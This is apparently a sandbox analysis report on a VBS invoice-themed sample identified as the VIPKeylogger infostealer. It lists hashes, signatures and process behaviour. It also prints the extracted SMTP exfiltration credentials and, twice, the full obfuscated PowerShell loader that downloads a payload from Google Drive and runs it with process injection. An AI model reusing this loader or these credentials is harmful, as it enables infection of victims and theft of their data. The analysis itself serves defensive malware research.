Analysis
-
max time kernel
117s -
max time network
195s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 16:15
Static task
static1
Behavioral task
behavioral1
Sample
FACTURA-ALBARANES.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
FACTURA-ALBARANES.vbs
Resource
win10v2004-20241007-en
General
-
Target
FACTURA-ALBARANES.vbs
-
Size
525KB
-
MD5
2358bb1bd8cf609df9f1917cf4224194
-
SHA1
45e0ca20b16c048979d95b59f40475f8fa282e32
-
SHA256
982fc9bb4315f9e7114479b0a684873cbdc9e99ed75d96a342fd46235f59e84e
-
SHA512
c2c0e324c07f027edb5e6c34ce368b7d3387fddf6078e5e17c80efa9211381ff58dc27acc22511d0d9f0775b08a43eabfbd7a00061d9f6a3689d3c07a23e9230
-
SSDEEP
6144:By/7hX57oFbgZQmRmM0rdGqqgLpjDLkB8Gj+xJ9HQ5/vyGVi4dAMuUnhbeDLttD6:kyRgiYgqSjDoB4x7w5XLduIeD53Vgzeg
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
1446010 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 5 1140 powershell.exe 7 1140 powershell.exe 9 2396 msiexec.exe 11 2396 msiexec.exe 13 2396 msiexec.exe 15 2396 msiexec.exe 16 2396 msiexec.exe 18 2396 msiexec.exe 20 2396 msiexec.exe 22 2396 msiexec.exe -
Processes:
powershell.exepowershell.exepid process 2964 powershell.exe 1140 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 2396 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2964 powershell.exe 2396 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 1140 powershell.exe 2964 powershell.exe 2964 powershell.exe 2396 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2964 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2396 msiexec.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1800 wrote to memory of 1140 1800 WScript.exe powershell.exe PID 1800 wrote to memory of 1140 1800 WScript.exe powershell.exe PID 1800 wrote to memory of 1140 1800 WScript.exe powershell.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe PID 2964 wrote to memory of 2396 2964 powershell.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FACTURA-ALBARANES.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Projectiles Aabenlys Retshandlen Consularity #>;$acetatsilke='Uladsiggrliges';<#Indsbningers Sebaceous allometric Regalvanise Ndvendiggrer Lgkupledes #>;$Tmmerhandlers173=$Ministeren+$host.UI; function Tmema($granaterne){If ($Tmmerhandlers173) {$Overgesticulatively++;}$Skalperingen=$Tubaist+$granaterne.'Length'-$Overgesticulatively; for( $Udbringningen=5;$Udbringningen -lt $Skalperingen;$Udbringningen+=6){$Udbringningennequalness=$Udbringningen;$Formiddagstime+=$granaterne[$Udbringningen];$Unaltered='Community';}$Formiddagstime;}function Eftertragtelsen($Hopperne){ & ($Geeing) ($Hopperne);}$Priscianist=Tmema 'NormaMDoe ioTeslazTrickiBlufflPinitlOdontaCulic/Forri ';$Priscianist+=Tmema 'Alunh5Pol t.Fryse0Autar Sind,(,dmntWLimonisol angringd Su poK ranwNedsasPensi KnyttN AmorTne,fo Knuff1Insol0Bulb,.Masth0Plade; skar SlubbWEm ryiVildtn berg6Space4Nonap;Flint OverbxKrige6 Hell4 Ured;topa. NonlirTryklvUdbom:Takti1S.igb3Fi,th1 rra. Anod0Gnath) Synk EjendGSvvefeHulefcOxbowkSyereoPeori/Billy2Fi,mo0Kvase1 Bran0haver0Capta1Adjek0Andaq1Bleak WolseF overiFlorurAg ateD,skrf CemeoFructxLucro/ Cor 1 ard3Nonde1Remem. yom0 Sola ';$Skematiserer=Tmema 'triozUmi reSFiberEFlu tR R ve- uggiA Res,GSeancE Fo pNAl edTDvehj ';$Diskettefejlenes=Tmema ' Pickh ThoftRedivtPatr pTriflsFiske:Clear/ djo/ DefedTrn ar abreiSubplvB.tnaeVan s.Mar igbasseo UnwroMe amgBlythlPhotoeN.npr. Struc DestoDiscemFi et/ProabuFaldecLevul?BetaledaakaxForgepHulkiol.parrSo,iatSekle= sprdd BrndoGangrw lvinnLandil Mi.poKonvoaF,tned,ries&.otaliSche dSkiag=Par,l1RmninGSkurrcPlentrAutodPSamsspDolicsT rzeOslada9ProsuFCatalj Angu6Kurer3Tj ekA StkyjMisdeZ Beath M.dtJWichto recuJSmu.vfNondebVanreJ SougW mlasH TvinY StacTAfbrkq rmmeWAvitaAOpmunG OceawAnretVPeror ';$Datauheldenes=Tmema 'Priv >Fav t ';$Geeing=Tmema ' Cavai LepteAn ekx V ge ';$Fabriker='Rifted';$Studenterhavrens='\Realiaernes60.Svo';Eftertragtelsen (Tmema 'Misas$UnderGConcilTaranoaftalbUnforaBibl l Afst:RakkeMOverbY lmioSkovstSkeggiRou,eCE eri=Fintl$ omuletyndsNHjernv.xcer: ByggAEkskrP Uperp Dec,DStngeASuzanTPiffla Kupp+Sn,bn$Be raS adavTAkantU,aglsdBarnde .onmNSjlerTDatase SclaRTaphvherektaforhavBook.RKolosEKoinen AnkeSUnflo ');Eftertragtelsen (Tmema 'M rke$VitriGOplstl ElemoP almbb rkeA Udm.LSolen:SidetGNoegeoUdstrDUrbanh ClavJMis rePulmoRMassiT BlodevaporDLandseDy ehsAntia=,bsol$Repr.d NvneiLogjasUeg nKDem.re Filtt Abbet Esthe P.ysfP acte Sti JDublel E uiE .estNStngeeSpgelSEvang.Tillus ollpFdepulH,ghbiBetontTweyf(Dipl $HabildIn omAStorttFll,saRabb u LivshPotp.eForf lNutatD Ta ke SejrNDisbaeN,edesRekla) Staa ');Eftertragtelsen (Tmema 'Mauve[BartrNTelegEH,eretBap i.,agnasTaleneScreeRPar ivBellbiMag ecOpht,EPostrPunthaONettoiFa atNDecolT UnliMFilipadimerNfl atAIckergSgsmaEFar drFl we] U,or:Incep:opslaSCre mEQuotiCSekonuTri sRFraraIMbelftPreopyHje.tppr anR SutlOBass t MelooSopr cstj.ro IndhlParap Ur.lo=Para Sacri[SkefunFron.EDevittBl.wb.IncarSAnmareU infc H eruTeglvR KimsiCurioTFeri y LigePSilesrBilleOC efptSiddeOTipolCvolaiO HerrLHamultDubleYLevanp ExpreTular]Resis: re r:Str pTTestilJavahSepenc1 fore2T get ');$Diskettefejlenes=$Godhjertedes[0];$Besigtigelses=(Tmema 'Rygek$PotteGare dLArgumoSelenBPatriATekstlHenvi:ratlaN yliooInterNsta gmjamaieUrgamdRundiiFlettcIrresIHalvaN etaa DybfLStour=U lannM scuEOpdrtW Car - astoKortsBSo leJOmsorER cirCbogreTSte,p DioptsHyracYSaddeSBarratJo,stE Bo tmMfind.forbrNolaioe UndeTBu ts.W rwowParaseAfkbeBApomiCDalarLTh.opiFiskeEsube NSideftSnurr ');Eftertragtelsen ($Besigtigelses);Eftertragtelsen (Tmema 'Euka $Inde,NLannioPreven ntikmHoldue DeridBisatiLysgtc Li ciAlpernOlieraRehuml Meje.SemiaHFlommeDruk.aUbevgdSopraeanfrer .versKanar[Lu,pe$ aturSOpsgnkCalcaeH.adrmSp staMileatBoofhiChiffsKombie bl,erKrnkee SkygrRepor]Sukke=Skatt$GapleP irkrp essiMythosPaasecSkadeiSvumma EngknEncumiCladmsSpl,ntSubsi ');$Kodogu=Tmema 'Doupi$UndesNJawbaoGat inStvsumFerrue .hoedBrugei c,incMahani St rn Handathin lKatte.arracDS.nktoBenytwTelevnTilsml Unlaopunt a ForhdF eelFsphini KravlFor eeRrels(Bitre$BryggDFifteiPaasks entok Milje,utoftY rdetFedere Sponf,tenhe K,ndjTar ilCanaseShipbnObnoxe nachsmales,Femog$BesugW Uop.oReob oDiag l AkuppDipnea Torbc L gkkCremesAfbre)Konju ';$Woolpacks=$Myotic;Eftertragtelsen (Tmema 'ordre$Ioti gTarsiLDundeoDubbeB G unA xoplBorg,:S porG TuniRIsoleaDrivkNBovisD TffeAKompodTorcuDMoorbYKldni1kolle3Contr0 Cell= Golg(OratoTCatakeEnsidsOutstT.choe-Ph,liP DbefaAcantt.orreH Ek p Maeg $ JolawForvrO Fe.lo ortLSkja PKarinAMislyc KattkadelasMetan) Unac ');while (!$Grandaddy130) {Eftertragtelsen (Tmema 'l.ngm$ElegigFstnil Logio MacebNiella Destl Rhip:JovicFBarwaoCountrKorrim.verfy jemfnArmordN.tabeImitar FamisPropek.nderamothebTaia eZombir GrinnOverae Lsep=Ndven$Sta dtInharrUnconuWatereSster ') ;Eftertragtelsen $Kodogu;Eftertragtelsen (Tmema 'Pi.fisEksilTMus,uaDe rar Tea.TRefor-AllicSPolypl FyrseLandeEC.nospBac a indus4dir c ');Eftertragtelsen (Tmema 'Ombyg$ ftnigPerveL acuOPa ceBApol,aTrykslCovin:TransGGrundRP eceADoormNAmts DFuldsA BrandBronzdBefrayNo.co1Soste3 Kvaj0Camou=Odon ( FlsktWatchECalanSSamfutValor-Forpap Bi tASnderTBerggHAngor Catna$ IraqWInstaoR,saloRubelLGran P BeteA .estCBrendkLi,kesYppig)Lowli ') ;Eftertragtelsen (Tmema 'Ovali$Tr quGDoucel StadOAntimBKwapaaFlyveLAndri:SkridP F,onRteks iplumaS LaplN .ejliCryptVconveESubl.ANedraU C ewSVasel=D spe$EksklGUramiln.utrOBrunebVriknA ovpLPensi: KonjMCrooka pe oK Stv.rUnnasOFalliKFreeba GeneLTitindletfreR loknparchenglep+Indka+,rapp%Asyls$Cornig ,popoAntepDcatheHTidsfJ JaghEK ociR b,svT V ideReva D VadeeForbesLeuc..Trak.CFler oRingkUKarbunWing tShac ') ;$Diskettefejlenes=$Godhjertedes[$Prisniveaus];}$whiterider=322484;$Vaaset=30962;Eftertragtelsen (Tmema 'Sol v$SkabeG eriel ReciOXanthbUdkobaSl mhLRaas : OverN foruo F.rdNSpunspAfs.aoKronipYoureuUnponLPlakaAD illRDiseml SkriyInkom2 Mink3tab l7Qinta R son= ,jem Efterg Unree Dipht .rne-Dom,ncAntedo ingvnEluvitLy,ose iggnRiveoTTrans Thin$Sd,rbwShirtOKunstOBuballKhmerp Rv,raPycnoc LidekRes rsdepic ');Eftertragtelsen (Tmema 'Di.et$CuratgAttrilJoltlounadeb UhygaAdvislGains:.radmTUnralrNovatlAsphegKlarlgSjkkeeu,hamnCountdVesiceCasca Postu= Mini B evb[ RethS BasiyF.rbrsE phyt ReakeFlimmmStori.skudsCAkvaro S monArco.v OffieCrater Ufort feue] roff:Sort :VeranF MaltrAggrao jninm S asBUni,aaNominsSttere R dd6Supel4ch moS dyretNitrorBeskyiUncurnB,vgegspray( Ingb$antiaNImpreoOlam,nForsepWilysoKodakpHeim uB nsklUnvila Preirpanetlf.emtyUdrad2Nedno3Decim7B.sep)Savbl ');Eftertragtelsen (Tmema ' Stvn$OestrGUgeblLWringODommebPetreaStri,LRende:KnstnsTil iKSaag aFabrilDekupOCentrtHellitGrounEM grn Y.gl= Trum Brim[ KrhgsLeksiyOmsorS RemiTKorriEbnkevMBacte.BermmTJurisE sselx ImagTpheno.CaecieForelNM.skmC S ddoAllw dComm ISt mpN Tu bgQu nd] Scru:Haddo:Brne aaeronsWa,blcTackbIFrergicardi. Drmmg pdate yskat irgs Moo.tQuadrR NondI ShelNBenedg.igyn(Dehyd$Hug ltEquivrCretilOptagGM,rdeGClocke SubfnSejr DKogleeTrykk)bi ol ');Eftertragtelsen (Tmema 'Cribb$Nerveg steL Palao ForeBM croaAchr,lKonto: SomatWhinseSandwMObeliaTe uiDHol,eAAutopGStamheMo phN,lbowe PumisFrems= Zoof$ RumbsSyph KPreasADe.mol Aktios lvatsekt T.onmueMemor.Ek pesForivu mbreBPropeSOrgietKonk.RSmrfeIRaffuNRetteGPures( Domm$ TillwForurhBr acIBaandTPol leder aR ProgiNo.medMacroeMiliarPsych,Leges$f ickvKetasAUn,haaLizbesC imaeSnohaTCa ag)Lrred ');Eftertragtelsen $Temadagenes;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LE633XOEDIK3IP62JHQE.temp
Filesize7KB
MD5a4910c1465c33c72c16c7ed565a9e426
SHA1884b2bb4ac964c160409883fc2550ff458912ab3
SHA256b8722b2c2efa1aebd3e63c43b853f8a76eb14fa400029bfe783907ec09bb096c
SHA5123f25e552387a68c4bdd908411e7cee2ff49f890bc756c8928ae8716aebdd0066938dafbf8d6aad7bea0545e9bc7bd0df67bb1beb2a97a5f5c294a039774550a7
-
Filesize
460KB
MD515d4bf8d1435c92eafc43ebdff22b873
SHA118a5e9c68c654584e41ddda35c8c1a7e8ea2e13a
SHA256ecc8d18d98910379300d492a98f573e56ca9daafd3b1cd52ddffd44c175832ce
SHA512463ca3c56eacd94dd062c048e630a14d7d89da4b16e589126357f92c32c0d42abdc0d53f59fa62ecebcee7703687b5cf75fe8a9e0dd8629745a5f6134015e41c